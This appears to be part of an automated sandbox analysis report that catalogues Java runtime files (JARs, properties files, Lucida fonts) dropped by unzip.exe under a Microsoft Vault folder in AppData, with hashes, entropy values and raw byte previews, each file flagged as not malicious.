SSDEEP:	49152:Xwm4w4ejiUA/aHoeGnjolnKc9VgtVdel8:6w4ejiTaH9jVnl8
MD5:	30A4DEA3F7431BBD4E428D64192A754A
SHA1:	59400AD0B6C22D492BDF90999FE849D46CD1FA70
SHA-256:	326BCCD4F531E6C02AA4FA1D0848040A04A51336935DE98FB3990CDD735EC34A
SHA-512:	C8123AA7F53CA803D8E574856A43B197E934C36B85343A5DC7E633D43F2467D009F6F5995448C890B2432087F9C37BEE34F84486D028E472AC369201E1CF8B11
Malicious:	false
Preview:	PK........HB>Y................META-INF/....PK........HB>Y....E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_291 (Oracle Corporation)....PK.........A>Yv.^.........,...sun/text/resources/ar/CollationData_ar.class.......4..........J& . = .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .& 0 < . < .& 1 < . < .& 2 < . < .& 3 < . < .& 4 < . < .& 5 < . < .& 6 < . < .& 7 < . < .& 8 < . < .& 9 < . < .& . < .< .< .< .< .< .< .& Z < .; .; .; .; .; .< .< .< .< .= .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .; .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\meta-index

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.164007461085937
Encrypted:	false
SSDEEP:	24:EV677x6CFRf08P86xX+4jz98oLqRsY8N2ri7DJ9t4QLlJVzDOFw5DOFFVzDOFvVj:EE796OfT0OZjzGXJ8orivJY6lDitfitj
MD5:	CC537911185FC7E6D62F23C1877BF812
SHA1:	C07A67C1C5464F6DE45143645F157DDA313C9E37
SHA-256:	88F7B99DC586B4C73647E3A64BF7AA33C26A4A10B5E6E225148889092B81BED4
SHA-512:	9DFD3B509CED4410428F2FF37857DE18F10824C88DA404631E38932867581216699894E7F4B4D25CF427CFF4CC161F052F1FD434B90152F98D4FB7675FBFA307
Malicious:	false
Preview:	% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# jfxrt.jar..javafx/scene/..javafx/geometry/..com/sun/scenario/..javafx/beans/..javafx/util/..javafx/stage/..com/sun/media/..com/sun/glass/..com/sun/pisces/..com/sun/javafx/..javafx/fxml/..com/sun/deploy/..javafx/application/..javafx/print/..javafx/collections/..javafx/event/..com/sun/prism/..javafx/embed/..javafx/css/..javafx/concurrent/..javafx/animation/..com/sun/webkit/..META-INF/INDEX.LIST..netscape/javascript/..com/sun/openpisces/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptuserFactory..jdk/i

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\nashorn.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	2035092
Entropy (8bit):	7.932695837926618
Encrypted:	false
SSDEEP:	49152:sw0mai9aNJn8ELXSHJQ2cPlDjr19ja/TuPkUk+D03qL:sw0oGJrLMi9lD/nW/6I+Dd
MD5:	CF8F3111167B5FDB97FDA623B3D2783E
SHA1:	D018247A53203867B80CCF2B070661DC35F27993
SHA-256:	F46C7DAE2B12859F335A0FEE3B4F673FF92AB020014217B74F559EF13AC30B9E
SHA-512:	9DDEF7F512ABAFA14AE0C0698A1B8832ADD96F8DB324020BC34E7EC1E989C86A470D19C4133FA037127FDB68E860F4EE4D45494E3090BCB4DBCEA1EA43A1615A
Malicious:	false
Preview:	PK........FB>Y................META-INF/......PK..............PK........FB>Y................META-INF/MANIFEST.MFm....0.E.&...:.P5Q.er....y.#T.+i..."..XoN...25.(..q...R.r......7....k.8yxX.....{~.Y..dn!.L<.."...s6.s..r.Y.-.@....mg.E....@...L...G...g..].a.....-.}.PK..............PK........CB>Y............6...jdk/internal/dynalink/beans/AbstractJavaLinker$1.class.S.N.Q..N[.mY.".....T......7.%....A...t..n..m........k51.....2..H.51....o..\|..9?~~;....9..J.Y.g...5......M%.4......z....=..v.OF"..7.#....-.e......nU...G^ K.a/.BF.....y.....C.C.^..!.R.eH.....j....aK.M...3].....=..;'.;]j..>C....#*.:..Z.(.N...JvEX.I.e..A..."j...C....t.C.q..:..>.J1}...z`..v...[.. .QTa..kXeX..'.1O.c..1...x..W..a.....3.Gl.VG8.C.tE5P...rN.&.v.....F.V.{.say.0^~m.....e....VW.B..x.h..u.i.K..F..j.[;;..Z.z.^f.8.q~.nR.n....Q.2..$.)B.$..\|.;.....'.&. .j\|@.E....FP#....A-..."...b.n.".H/c..Ho..s.I./.X..p...}..]F....SP.L.u."@..$o.9.b.'.!.;X~6..PK..]./.<...H...PK........CB>Y............K...jdk/intern

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\sunec.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	47528
Entropy (8bit):	7.915037763204285
Encrypted:	false
SSDEEP:	768:5XDXksVMbLjwPCw0DrK6i1lk7aCSSkjt4SlKrPX+tVGqMmZAwSe14TZtd69p2Hs7:RD0s6Hw0Dm6oG7aCSSiN8PX+XGvYge13
MD5:	80807F20ACA63BC5E05E144393E86267
SHA1:	34968C4B15BDBB77B4B79FA39F06EBA38616A7FD
SHA-256:	02619ECB3F2FA3B4921272E13EAC488851B6F2596EAF09CD892F2D8C3B504B02
SHA-512:	8316118E1057886BB4CD99BEC835CF525432E7D0EA5AE87DDACDC7F1CFE04B6E36F60D92F75889EF9F9D3ADB4EDE7B41361D6620D1DA13E5C9107F9E4B8E1CBE
Malicious:	false
Preview:	PK........-.>Y................META-INF/MANIFEST.MF..M..J....Q..E-f.....b...\|...nn.hZ.\|#..G....w.....!...9..4...P7...j.......~R."..@M..^.na.....t..nQ.30.Q....~..a1.........D0..."P.W.u.D)..yU..O.X......(......b?..I..p.2.G...7....Av..\|......h..'..A..W~..^.t..l.....d.NwD..3}~.....Q[.f..h.K.[..{\.b.(.oQ......^..~]..p..I.N..f..I.Y7..cE./.r.<..J..@.P..8..!j.V..A...X....m.0.EGr+S....m.s...N..zk..Qi.z.....5>E.......h4..l~...K...X....R"..)kr~`).<{...J..w...:..DJ1.J....I..H{H/C$0...:5.b........k9.s...=.@Kt.k1m-..'\wpI..qC<..%/...1...xDA.V......Y.\|....Py.b....;."@..!P1=(.m._n.%..7.h.j(.%Xh.....X~......%<mCP...=.=..`w..[5.S7F[...VHB..W.%...0S.d..../.X2...t...B.8..c..M.:u....Q..r...vsN.j.s...T..GEn.TMjF....1.i.:k.L.......k.e%..Dg...Y.......$.r..g.G.v.1.\..#......c..:........?.G.E.0......Mi^....Kw.%...wk.+WJm...?;D...\|.UUu...\|.."$..J..U.l....J..C...<&Ym...$\....7..\x.TC.,.o.s.....v..S.....dkD. ...S.....,)....%.....c.h...ef......h^..fZd..y...._t.A...

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\sunjce_provider.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	297894
Entropy (8bit):	7.90346873253431
Encrypted:	false
SSDEEP:	6144:zQFfvPe9o9weTQOUJh7GqxX2TVTxP2CQxYchX/XI:j9ddTJh7jxX2jP2CQOwI
MD5:	A5073AE23F164A07768B675B6C390D1E
SHA1:	CB4CE0E2B1C4E9E39DC280F05C20D5F01C86D90A
SHA-256:	4FB81880543C2B25B929A162338FAD3507F71CA82C181DF091B2620EF92CBD8E
SHA-512:	9BBA5AFFC405EC63B9A65E95586755960DA48CB8BFD28E82D494576647E50D2634DB8E5CC47937EF875CC1C40E2EFBF15C06C4F1902C7D490F9BCD8F61533126
Malicious:	false
Preview:	PK........-.>Y................META-INF/MANIFEST.MF.\|G..H..}#.?.a...b...6..`.CX...e...$....[..h%....Z-..U...2.J.."M..on.?..../........I.!.......:../.`.~1.v(..c;.}.}....e........X.$*."..6......AT'..]...O../{..oR.._....cl.....3.`H....6._..c...q...M...y.......E.z......`H...Mo.7LA....5.../..P..+..?>+.\..\..Y...wS.'=.r..Y.\|.._..f.........B...1.7..G.._$DW..CD{.dd......z.aNw........e..c..s\|J.h........?EBt..,.;zx.G.... 7d.q,E/"S1......l@..<."..k.C...B.&.=....%..M.=E......._.q...>.W4, S.....b..h...J.....]....m...lq...Hp!z..R8..\uSQ.L..S..$!+..S.M..l.=".$..X..$......wC.v".B.T.s..E.y..1v..T.DQ... ............h}^...b~?...Zg.q\..+...R..1{....K.{3.(..8}<>..............Y...V.........M.....)#/..K..."..e..1.d.....-...aCl~.s&c{b./]0.>....y.)%.W$.Mz..T.6.C.E:ZL%..F.??1$....Jr\...e.i.8......M.sl..._.."....;..k.C...W...@x./.i.;..E....,...C.W..%..8...AZ..})4...z..P.....YK.8}..bh..$..b.iOl...`.w..a.X5..A...p.Z4U...vn~.}....}.o.y.!..cPk.\r_D.G.I.N'J.Nu.9

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\sunmscapi.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	53806
Entropy (8bit):	7.89863290681005
Encrypted:	false
SSDEEP:	1536:VSp08t8sQhM46ggo/YdyO+w2EX4rKR+UzHHYyFvdZyDhBtaW27OfYZY3z75nRj0k:Vk08YJM2EhY0EsCREQ
MD5:	4FC476DE460B1AE7FCDFD38C837A358B
SHA1:	C8C98EDFC6039EC622D83025772585036043BD11
SHA-256:	94464B7CC5EA65F09E1E2922D5BCFBB63C582E6EF6F7E0EF2D40CC77117B15EA
SHA-512:	ED0D6A4EF6C4FC8FE18F563DC2F4DB34CD9463490BD507B8BEB495353FFAB4FC64E9FE5F95D14AFC305A7B5A0083C8282E88C1706EDE1832FF99402C7C3FD926
Malicious:	false
Preview:	PK........-.>Y................META-INF/MANIFEST.MF...........E/....+.:....9......R..o.~..3.f.[...L...3.c....A.8.n`Y\|[._........m...\|.`..o.5...-..B(zX...E?...f...o....d.@.c....8.......,........b..K_..ET._....f..O.6..\|...?.}.$.-(...r..........nm...W.....v..7s..X..........A..V...@...D]....(.A..0...L_8....(......y!.......}[..s..q..D1.b....N.Y.._D...m.i......I..]..h......B.d.]o9.W...#3..._...d.P.{..1g.~..B....T.xs.Mu...7...c..].j.^Q\|.wR..n}.C9.....K.x...!.N..Z.......`3..`...j.&..o.W.j..}.M.-k...m...\..*.x47dnO.....K<..Xs...N.............,..>q'..27...h.7...o:.<5._...?.E[?4lh....S.D.S..Q.N+7.p.5r..1..^.....49....V......W.v.....Y..S.u;....(.o.=..[..^..................t.o..b......O..>.S8xK..+....".....ht..........<..u..5m..\|\.OT.l....^.2.ju6..C.5`>...8.eK..2......G,.....v...tq..h?b.n-....n.H.....@}H%......q{.7.bO.....P...G..ve...v:...+...5......b5..!!b.FN.tb..y...Qf.[.VZ:..{...{......eo..4a%....'.7O..,.M...FZfy...G.^n.Pr...R.Y..:...^&.;V.....P..i..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\sunpkcs11.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	295694
Entropy (8bit):	7.958097660901853
Encrypted:	false
SSDEEP:	6144:Uakkhd2WmnpgL1EYclAXAtFUVnwktRQUUjL7oHhKvVsxTLEjlCLygzUx:Uakkb2vn+L14lJWdUjoHsvVsRLEJOygs
MD5:	98B1B1DBF73AA2D185DC767C1C729A5A
SHA1:	6E6CED238CCDF46B58ED2C5ACEA02BCF024DB4DF
SHA-256:	72147D20381975FCCB92CDB73CBFC6F1C4F712D364CD58A4EB22BC7ECDD1BE58
SHA-512:	D4A00E56895397B430CCE998E6DF99D0AB8E06A816F4D96C81271FD65CF4F104CC86A48D2CFE2AE0E0F8424F1CB53FF59A821001759A4F964BCA72DFBB4FBE3B
Malicious:	false
Preview:	PK........-.>Y................META-INF/MANIFEST.MF.{I..V......... l@..G....g!.t0......v...T..B..{3.9.7%yu.G...%............W.eTE...._.nfC.....&.>.CVE_.z..~{.....e.?..(.....FA.g._O.a...E....M.6.?...........4...X..e?/O-.!n....r_........o..]........?.nm..._...(..X..}\|.{.._........3...d...../....G..e...E..0..Y.z.]Ty..uF.t..Fu..\|....^.?.r......SY.8.?..\|.......$...8.)0..e<#y..l..6.....0w^.F.H._q..9.2.gVY".c<.PSB.h,../$<N7.!...%....b....B....G..q$...Y.d......OR.;f-@U.J..l..dH..".o_.n.MZCV>3u-...T.....S..-..k..=.T..p.M......9..7..m{.<..5XG.....%.p..~....o.Ac.U.4`.7..xS.G}3vAD...X....b.f......b..b.QG.....4gV....n.z ...\|.h.._..\|f.G...%~_Ly.?......g.S.....:....E^....i.".6}.+...t.=<R.....HIc.\(f....:.U..].b..#o...<.{..D.$Ig.f.Dk3...k.XUw.&..o.pI...J...W..3.s...j.36...K&.i......KG.2.].....J.".........]{...N....I...0.~..;p...>..L.F.U.i...\t...Q.4M...u.._..].H1.>.\|.......^..G...4e..q.O...O.......BQbL.W...z...Tf,....._....3$.r2gr...W\g.g..Kp...}g..e..U

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\ext\zipfs.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	70319
Entropy (8bit):	7.952318814718103
Encrypted:	false
SSDEEP:	1536:hSmaqtsRW0DWyqPoQ3k6wW8MU2j+rNPrgp/N:kmaqtqWToQ34WziNEH
MD5:	B3AEE8582F98D8EC267FAE3CC4541A88
SHA1:	38AFF481255EC26D06F7DB407D8DD8DAEA3B076C
SHA-256:	3ECA051E165914A2C20110C996571D26BA47F13A56A25BC806CAC9F0321BB28E
SHA-512:	DE486052F9D906FF5A1A4160BEE572546CCC0A36717F53E5EF916334490CB84B2A26DD62AB694E3BF766912493895F85C1A4D7BCF4F6E5F29D86FD6D69797DC4
Malicious:	false
Preview:	PK........@B>Y................META-INF/......PK..............PK........@B>Y................META-INF/MANIFEST.MF.....@.D....[j.ITP..`.!.Tl....>.....M,\|E..9.......L.Kk.$...L7.4......T...;,.Aj]c...'....a.p.. 5...Y.C?....$..g.g.JY...x...U......`.J`4D.......P[.a]d......r..4Q..{..qv.PK....c....M...PK........6B>Y............-...com/sun/nio/zipfs/JarFileSystemProvider.class.U]S.U.~NH.a.@..B.\.!.$.U[.X..J..H..G...$,Mv.....z....9...........Z.d..a.1.y...<..s.y...~....x&c......q..B.`B.......'b.4...'e.1%......i!f../aV.L......B,.XD..KX.......V..^..@....`SD..`[.C._0.'..p.2.EF...SV.3t-.&OW.Yn....i....vx..=..]}O.J.Y.2.m..q.Tmc.Z.....H.arW[[I.7.L...F.k.E&...../.z.J...,U. QD...%....v...".+s.-f.....e..3....."..bvu[..b..Ag.<I7U.^J..j....~.W\.2....i.j..1C7..:..U.QM.UG.d.c`4.8.Pf..MA.E.;0...1.r..bX..$l>h..%..,h...."^=m.90]}.T.}'.&...B;m.-.9.\T....x.p.laD.....#..U.r..P..o...(.a.....`.E.....1..4-......fT......H.kN..1....r.Z"7.J+d....B5.'U...e.).!...rt...^.p3..k.8.j.:..k5T...

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\flavormap.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3928
Entropy (8bit):	4.86616891434286
Encrypted:	false
SSDEEP:	96:pTgwOsORUjdjTD6QfxWkVIyiVyV2mjuVwwY:Jgw5TjdjTtpWk6ylV2zwwY
MD5:	D8B47B11E300EF3E8BE3E6E50AC6910B
SHA1:	2D5ED3B53072B184D67B1A4E26AEC2DF908DDC55
SHA-256:	C2748E07B59398CC40CACCCD47FC98A70C562F84067E9272383B45A8DF72A692
SHA-512:	8C5F3E1619E8A92B9D9CF5932392B1CB9F77625316B9EEF447E4DCE54836D90951D9EE70FFD765482414DD51B816649F846E40FD07B4FBDD5080C056ADBBAE6F
Malicious:	false
Preview:	#.# This properties file is used to initialize the default.# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-.# specific, default mappings between common Win32 Clipboard atoms and platform-.# independent MIME type strings, which will be converted into.# java.awt.datatransfer.DataFlavors..#.# These default mappings may be augmented by specifying the.#.# AWT.DnD.flavorMapFileURL .#.# property in the appropriate awt.properties file. The specified properties URL.# will be loaded into the SystemFlavorMap..#.# The standard format is:.#.# <native>=<MIME type>.#.# <native> should be a string identifier that the native platform will.# recognize as a valid data format. <MIME type> should specify both a MIME.# primary type and a MIME subtype separated by a '/'. The MIME type may include.# parameters, where each parameter is a key/value pair separated by '=', and.# where each parameter to the MIME type is separated by a ';'..#.# Because SystemFlavorMap implements Flavor

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fontconfig.bfc

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	raw G3 (Group 3) FAX
Category:	dropped
Size (bytes):	3778
Entropy (8bit):	4.416740385938501
Encrypted:	false
SSDEEP:	96:iX/WgWWWW81dp83p3j7WOk4BxciETBT5BLrws+LW/Be6J2:iXtWWWW8/e53PNxci8juWW
MD5:	AD8365719B70A2DEADE79683D8986A15
SHA1:	88CBF37D05F28691B7F82E74FA891792E93B41B9
SHA-256:	B2AB990DF3C4C1C2EC4317AAF22C946DF17F0796727DBDA712402307C56558AC
SHA-512:	287B19B6996A189BAA3CF2894A57917B14B0615D551C5248AD55860678E5D6E58DD21247799BEBE91B8236FC2F5300399FCFC1BB159EDB9AE8D663805C6A30F1
Malicious:	false
Preview:	...&.........:.^.p.........#.a...........6.>.:.-.9.<.=.3./.0.;.4...2.8.1.5.7................................................................................................................................................................................. .!............. .!.................................................................................E.D.J.G.B.H.F.C.@.A.?.I...........................................................................................!.".#.$.%.&.'.(.).*.+.+.+.+.+.K.O.W.`.h.g.Z.Y.f.X.T.^.a.b.c.[.Q.\.R.U.L.S.P.].e.N.V._.d.M.i.l.....t.s.n.}.\|.......r.q.~.u.m.y...v.z.x.{.........j.w.k.o.........p.......................................................................................................................................................".......#........... .................#.(.-.2.7.<.A.F.K.P.U.[.a.g.m.s.y.........................................................!.).6.<.I.V.e.l.~.............................&.2.>.H.S.\.h.q.}.............................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fontconfig.properties.src

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	10578
Entropy (8bit):	5.1846955343833105
Encrypted:	false
SSDEEP:	192:r+e6a1nsNi8bTeOiO/Ywca9nB2RwhCdvBQGuo6wj:rlnHIR9B2Rwhifj
MD5:	77CD430A6D793B50B4501EDC37A1E533
SHA1:	D18014CC830FA07C6DBB7D8B6EDBDB4178B9D241
SHA-256:	2C5837CA86D000A8621275540D1380880852CF6DE2CFD7496418741B7E88BDF9
SHA-512:	705BD76336D20D0C5C30266CBCD8FC91CF0FF1901BDCB682119174173F765BCC50291676664071619AC7AF521A8D1C137F78EFAF065AFBE4A6BF413F9F604401
Malicious:	false
Preview:	#.# .# Copyright (c) 2003, 2018, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..# Version..version=1..# Component Font Mappings..allfonts.chinese-ms936=SimSun.allfonts.chinese-ms936-extb=SimSun-ExtB.allfonts.chinese-gb18030=SimSun-18030.allfonts.chinese-gb18030-extb=SimSun-ExtB.allfonts.chinese-hkscs=MingLiU_HKSCS.allfonts.chinese-ms950-extb=MingLiU-ExtB.allfonts.devanagari=Mangal.allfonts.dingbats=Wingdings.allfonts.lucida=Lucida Sans Regular.allfonts.symbol=Symbol.allfonts.symbols=Segoe UI Symbol.allfonts.thai=Lucida Sans Regular.allfonts.georgian=Sylfaen..serif.plain.alphabetic=Times New Roman.serif.plain.chinese-ms950=MingLiU.serif.plain.chinese-ms950-extb=MingLiU-ExtB.serif.plain.hebrew=David.serif.plain.japanese=MS Mincho.serif.plain.korean=Batang..serif.bold.alphabetic=Times New Roman Bold.serif.bold.chinese-ms950=PMingLiU.serif.bold.chinese-ms950-extb=PMingLiU-ExtB

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaBrightDemiBold.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
Category:	dropped
Size (bytes):	75144
Entropy (8bit):	6.849420541001734
Encrypted:	false
SSDEEP:	768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
MD5:	AF0C5C24EF340AEA5CCAC002177E5C09
SHA1:	B5C97F985639E19A3B712193EE48B55DDA581FD1
SHA-256:	72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
SHA-512:	6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
Malicious:	false
Preview:	...........pLTSH$....#.....OS/2p.{........Vcmap.U.z...T...jcvt 8.E.........fpgm..1.........glyf@>.7...l....hdmx..(:...t..1.head.?....T...6hhea.U........$hmtx..ys...... loca..\4........maxp.8......... name..#.........postM.IA.......prepbM.h.......W.............).......).....d. ............................B&H.. . .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{\|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaBrightDemiItalic.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
Category:	dropped
Size (bytes):	75124
Entropy (8bit):	6.805969666701276
Encrypted:	false
SSDEEP:	1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
MD5:	793AE1AB32085C8DE36541BB6B30DA7C
SHA1:	1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
SHA-256:	895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
SHA-512:	A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
Malicious:	false
Preview:	...........pLTSH.....#.....OS/2k.{........Vcmap.U.z...T...jcvt =jC.........fpgm..1.........glyf.......h...Jhdmx.......`..1.head..X.......6hhea...;.......$hmtx.b......... loca..\....0....maxp...:...D... name .7]...d....postM..A........prep.C.f....................).......).....d. ............................B&H..!. .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{\|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaBrightItalic.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
Category:	dropped
Size (bytes):	80856
Entropy (8bit):	6.821405620058844
Encrypted:	false
SSDEEP:	1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
MD5:	4D666869C97CDB9E1381A393FFE50A3A
SHA1:	AA5C037865C563726ECD63D61CA26443589BE425
SHA-256:	D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
SHA-512:	1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
Malicious:	false
Preview:	...........pLTSH...2..:L....OS/2p.\|y.......Vcmap.U.z...T...jcvt F.;.........fpgm..1.........glyf.}.....@....hdmx?..p......1.head.A![.......6hhea.......P...$hmtx3..9...t... loca6..........maxp.......... name...p.......~postM..A...H....prep.......................).......).6...d. ............................B&H.... .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{\|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaBrightRegular.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
Category:	dropped
Size (bytes):	344908
Entropy (8bit):	6.939775499317555
Encrypted:	false
SSDEEP:	6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
MD5:	630A6FA16C414F3DE6110E46717AAD53
SHA1:	5D7ED564791C900A8786936930BA99385653139C
SHA-256:	0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
SHA-512:	0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
Malicious:	false
Preview:	...........pLTSHN..U..=....~OS/2...S.......Vcmap..tO...T....cvt =\|t>.......tfpgm..1....`....glyf.J.........Jhdmx]......D....head.WD...h...6hhea.j.........$hmtxW.6\|........loca............maxp......4.... nameJO....4....rpost..g...8,..M.prep.].O.......T.............).......).....d. .............."....`........B&H..@. ...D.]...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{\|}~......................................................................................................\|...........~.............&.u.z.~.......................O.\.....................:.R.m.......... . . . . " & 0 : D t .!"!&!.".%....................3.b.r.t....... .............&.t.z.~.........................Q.^...................!.@.`.p........ . . . . & 0 9 D t .!"!&!.".%....................3.^.p.t.v.........W.......M......................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaSansDemiBold.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
Category:	dropped
Size (bytes):	317896
Entropy (8bit):	6.869598480468745
Encrypted:	false
